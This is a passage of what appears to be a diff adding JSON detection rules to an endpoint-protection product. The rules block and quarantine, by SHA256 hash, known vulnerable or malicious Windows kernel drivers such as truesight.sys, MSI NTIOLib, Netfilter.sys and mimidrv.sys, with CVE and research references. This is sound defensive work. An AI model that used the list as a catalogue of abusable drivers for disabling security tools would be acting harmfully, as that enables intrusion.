+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494196Z",
+ "creation_date": "2026-03-23T11:45:31.494199Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2143ad726c1d98f46dd3fa848294ce5e5c5c1ebb4414762c13b0e427f9d6d42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b0d4dcd-a24f-510e-85ef-1401806f03dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614596Z",
+ "creation_date": "2026-03-23T11:45:29.614598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b1c0132-0f87-53b9-a3e9-598681d12184",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828707Z",
+ "creation_date": "2026-03-23T11:45:31.828709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2463da4c24ab4e8beee552c24f2a70316aa2cb8c3ec148ce446b3a11a8b08956",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b24d52f-c3b6-563a-b568-b415e288987f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820244Z",
+ "creation_date": "2026-03-23T11:45:31.820247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34580b7c46cf2ba86ec120aa94c5c6a74347eb8e214165b2d0bcc4f51a310ebd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b2e4de4-b4f1-5688-b0c0-14e7e1bd315d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825511Z",
+ "creation_date": "2026-03-23T11:45:31.825513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e03e2302933fce5d5e302bce826ff8ed6f1d3d57363f611a3855b1f18121431",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b354715-a8d4-50dd-b4fd-7387f41976e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467919Z",
+ "creation_date": "2026-03-23T11:45:30.467922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c005f1bcb549d76ab86390217ad6b3a2226ec74fd6f4595c0fd28b73102b1b99",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b40143f-a5f1-5480-9a6f-a3dc8de0f0ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972908Z",
+ "creation_date": "2026-03-23T11:45:29.972910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "238046cfe126a1f8ab96d8b62f6aa5ec97bab830e2bae5b1b6ab2d31894c79e4",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b4b0dba-3bf6-5928-9271-9e40c906fa85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613787Z",
+ "creation_date": "2026-03-23T11:45:29.613789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6dafd15ee2fbce87fef1279312660fc399c4168f55b6e6d463bf680f1979adcf",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b5f7cbd-f507-5415-9529-20310e67627f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454919Z",
+ "creation_date": "2026-03-23T11:45:30.454922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22da5a055b7b17c69def9f5af54e257c751507e7b6b9a835fcf6245ab90ae750",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b68cf26-de42-5958-a6f6-89188fe44e69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812907Z",
+ "creation_date": "2026-03-23T11:45:31.812909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9700d4a0ec9ab9aebd902664586c608ea41255f181fdd60e4e4f97faff4c8efc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b6b55f3-9d75-50a2-883f-a4f7c2a6cfcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622828Z",
+ "creation_date": "2026-03-23T11:45:29.622830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "507cee84e2924e81916c8bf090efb1beab3c258a79e1e1bf3637b8b7824d0a86",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8b8f1810-a120-5dc7-aca8-7320c2d51160",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605487Z",
+ "creation_date": "2026-03-23T11:45:29.605489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98a123b314cba2de65f899cdbfa386532f178333389e0f0fbd544aff85be02eb",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bb42c60-1d10-5ad3-aa54-9eb7d3d53dda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486010Z",
+ "creation_date": "2026-03-23T11:45:31.486013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d0c87a31a5e5c22ccd722f80165f98023b8ffa270a03ee174728e8e247d05b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bb87c0e-a975-5774-a6ac-6e726a11efd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492250Z",
+ "creation_date": "2026-03-23T11:45:31.492252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b266100dc2c0a9c657e443e0123842404478d170e113f81fe18a5b0e9f915735",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bbbfa75-1155-5e2d-b741-079d4914edc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470341Z",
+ "creation_date": "2026-03-23T11:45:30.470345Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7442192141d056cef53a570d072759a648393be52019f32e93ccb7aec5715feb",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bc68ea2-ae89-557f-8f21-d13ced1d7ab7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480365Z",
+ "creation_date": "2026-03-23T11:45:31.480369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b2d29f8984a3c9649765ab359580c590371d32d7279a5553750ce95d0f4f477",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bd0fc17-6c0d-53d2-97a0-dbdcf564452c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606079Z",
+ "creation_date": "2026-03-23T11:45:29.606080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46621554728bc55438c7c241137af401250f062edef6e7efecf1a6f0f6d0c1f7",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bd267b4-1790-56ff-ad77-8180b2fa89c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821853Z",
+ "creation_date": "2026-03-23T11:45:31.821856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d04ac62221a46998dfe281b055ca507840fc0275bf7535d11aeac25a80b654c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8bf73bc3-f8b1-5d4e-8d23-fda0e56ff72e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146710Z",
+ "creation_date": "2026-03-23T11:45:32.146712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146717Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "331a5bf8965b6410c5517df3ffad4d15afc4390f5b482a6e5fae1c01dd55059f",
+ "comment": "Vulnerable Kernel Driver (aka 8492937_2_Driver.sys) [https://www.loldrivers.io/drivers/c95a796a-a8f6-4cfa-bc42-4936ecb59091/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c06113b-9892-531f-ba51-22729b956d4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833588Z",
+ "creation_date": "2026-03-23T11:45:30.833591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e132a6ba87d65723faa4a27ac5857bed428fb9983ac817b20a4c37a33070dd0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c095117-2e46-5c71-9449-16ed20955113",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148468Z",
+ "creation_date": "2026-03-23T11:45:31.148470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63298626b1d4aea3c8b8b838ce3412f4e501986af353004083358922810290ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c0b65dd-ab42-58f2-9197-0c842c3b8117",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151599Z",
+ "creation_date": "2026-03-23T11:45:31.151602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4494f5066385b1ccd758a513c426556b8591288c5bd180ddea35f42bae761b18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8c11cab9-7ce3-549b-bdda-7752d65c6cbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828022Z",
